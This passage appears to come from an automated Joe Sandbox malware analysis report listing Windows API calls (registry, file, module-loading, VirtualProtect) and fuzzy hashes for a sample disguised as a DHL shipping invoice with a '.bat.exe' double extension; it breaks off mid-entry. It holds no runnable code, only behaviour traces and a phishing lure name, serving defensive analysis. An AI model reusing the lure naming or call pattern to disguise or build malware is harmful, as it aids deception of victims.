                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023B0
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 004023B9
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423396785019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396758425.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396814335.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000450000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423397113724.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseDeleteValue
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2831762973-0
                                                                                                                                                                                                                                      • Opcode ID: 6e579435eca9b4b687e1d7b96289a1719cefcc3e0237eeeb9f7ae371a7a8e2b7
                                                                                                                                                                                                                                      • Instruction ID: 2791961e855c801182d2f4b3e101f078c994d4f4985963d794b0561754721dd9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6e579435eca9b4b687e1d7b96289a1719cefcc3e0237eeeb9f7ae371a7a8e2b7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E6F09632E045119BE704BBA49B8EABE72A89B44354F29403FFE42F71C1CAF85D41676D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(?,00000020,?,00403401,0000000A), ref: 004066A6
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 004066C1
                                                                                                                                                                                                                                        • Part of subcall function 00406624: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040663B
                                                                                                                                                                                                                                        • Part of subcall function 00406624: wsprintfW.USER32 ref: 00406676
                                                                                                                                                                                                                                        • Part of subcall function 00406624: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040668A
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423396785019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396758425.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396814335.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000450000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423397113724.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2547128583-0
                                                                                                                                                                                                                                      • Opcode ID: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
                                                                                                                                                                                                                                      • Instruction ID: 155b38c425e345f43688a0673e138072f65e923c2ca09dacbbabb210d44f0fbf
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 50E0863250461156D31197709E4487762EC9B95750307483EF946F2091DB399C36A66D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405DB4
                                                                                                                                                                                                                                      • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DD6
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423396785019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396758425.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396814335.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000450000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423397113724.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$AttributesCreate
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 415043291-0
                                                                                                                                                                                                                                      • Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                                                                                                                                                                                      • Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateDirectoryW.KERNELBASE(?,00000000,00403382,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,757C3420,004035D9,?,00000006,00000008,0000000A), ref: 00405874
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405882
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423396785019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396758425.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396814335.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000450000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423397113724.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1375471231-0
                                                                                                                                                                                                                                      • Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                                                                                                                                                                                      • Instruction ID: b5712d1dc6f90c91938fb9970759bfac189bcafefc635788875416fd9ee2894b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2FC04C712155019ED7546F619F08B277A50EB60781F158839A946E10E0DB348465ED2D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • EnumWindows.USER32(00000000), ref: 73A42B6B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423415300742.0000000073A41000.00000020.00000001.01000000.00000006.sdmp, Offset: 73A40000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423415272754.0000000073A40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423415327749.0000000073A44000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423415355677.0000000073A46000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_73a40000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: EnumWindows
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1129996299-0
                                                                                                                                                                                                                                      • Opcode ID: ea91d125d52b75428ec43ec403d1fd79ceabace3a8ff6cb611326dcb20d45a29
                                                                                                                                                                                                                                      • Instruction ID: cb3ccf3b0a2480feebd05708f6decf8247152f411bd50387ce5dd3d932391800
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ea91d125d52b75428ec43ec403d1fd79ceabace3a8ff6cb611326dcb20d45a29
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 124161B680020CDFEB31EF6DDA477593775EB44354F34582BEC09C6258D73698828BA1
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 0040280D
                                                                                                                                                                                                                                        • Part of subcall function 00406201: wsprintfW.USER32 ref: 0040620E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423396785019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396758425.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396814335.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000450000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423397113724.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FilePointerwsprintf
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 327478801-0
                                                                                                                                                                                                                                      • Opcode ID: 2074296acf118ace0f9b9ab2ab8615e2fe297c7dd6636d95e153eafbd2080ce7
                                                                                                                                                                                                                                      • Instruction ID: 7f9197a1b1888ebfd6de04269447b21ffcaf0972564048b2e7bc6ee4a29003df
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2074296acf118ace0f9b9ab2ab8615e2fe297c7dd6636d95e153eafbd2080ce7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 29E06D71E04104AAD710EBA5AE098AEB768DB84318B24407FF201B50D1CA7949119E2D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402343
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423396785019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396758425.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396814335.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000450000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423397113724.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: PrivateProfileStringWrite
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 390214022-0
                                                                                                                                                                                                                                      • Opcode ID: 8d5bed1eaa9c21b7d608f8919ca3b143956f4a650d469f74d9cd9ecffb6d68ea
                                                                                                                                                                                                                                      • Instruction ID: c1725c34c84eed099ded2eadaed0aef72a921931f8640c1422412bc8ca1d20e4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8d5bed1eaa9c21b7d608f8919ca3b143956f4a650d469f74d9cd9ecffb6d68ea
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 89E086315046246BEB1436F10F8DABF10589B54305B19053FBE46B61D7D9FC0D81526D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004032FA,000000FF,00416A00,?,00416A00,?,?,00000004,00000000), ref: 00405E76
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423396785019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396758425.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396814335.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000450000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423397113724.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileWrite
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3934441357-0
                                                                                                                                                                                                                                      • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                                                                                                                                                      • Instruction ID: 8754e0b6f25d564075f0081c534dd79b85a2df0f0bc88b3642164a4a3ec1e455
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FDE0B63221065AAFDF109F95DC00AAB7B6CEB052A0F044437FD59E7150D671EA21DAE4
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403344,00000000,00000000,00403168,?,00000004,00000000,00000000,00000000), ref: 00405E47
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423396785019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396758425.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396814335.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000450000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423397113724.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                                                                                                      • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                                                                                                                                                      • Instruction ID: bd732019988057c431ec21c3a2c50b1292625b962aa4d7912315599e48db2a91
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A9E08C3220021AABCF20AF54DC00FEB3B6CEB05760F004832FD65E6040E230EA219BE8
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • VirtualProtect.KERNELBASE(73A4505C,00000004,00000040,73A4504C), ref: 73A429B1
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423415300742.0000000073A41000.00000020.00000001.01000000.00000006.sdmp, Offset: 73A40000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423415272754.0000000073A40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423415327749.0000000073A44000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423415355677.0000000073A46000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_73a40000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 544645111-0
                                                                                                                                                                                                                                      • Opcode ID: c1571a86018997ef32cb9b2c8a0b831f1affcf244be3f32afcf33a638e0e8c7c
                                                                                                                                                                                                                                      • Instruction ID: ae04ad0574b931e71ad9d369e826908a3b9b4cfc2f5c2821dc89cdba1e44df7d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c1571a86018997ef32cb9b2c8a0b831f1affcf244be3f32afcf33a638e0e8c7c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0CF0A5FA500288DECB60EF2E84477093BF0FB89304B34462AE99CD6281E3364046CF91
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040237F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423396785019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396758425.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396814335.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000450000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423397113724.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: PrivateProfileString
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1096422788-0
                                                                                                                                                                                                                                      • Opcode ID: 3f3571743ae8bb518db273e1d5473214efdc558287c9048febf32fba17a38326
                                                                                                                                                                                                                                      • Instruction ID: 3d6fae6e588f42459dd5c721a8c471f59e455a0f8de0d1d47597fcd0a09f6ae9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3f3571743ae8bb518db273e1d5473214efdc558287c9048febf32fba17a38326
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 68E04830804208AADF106FA1CE499AE3A64AF00341F144439F9957B0D1E6F8C4816745
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,0042C228,?,?,004061B5,0042C228,00000000,?,?,Call,?), ref: 0040614B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423396785019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396758425.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396814335.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000450000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423397113724.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Open
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 71445658-0
                                                                                                                                                                                                                                      • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                                                                                                                                                      • Instruction ID: b908bd292ce434c6339c018d18c1e3bfafdd2f7559b63d477f04a141d62eba1a
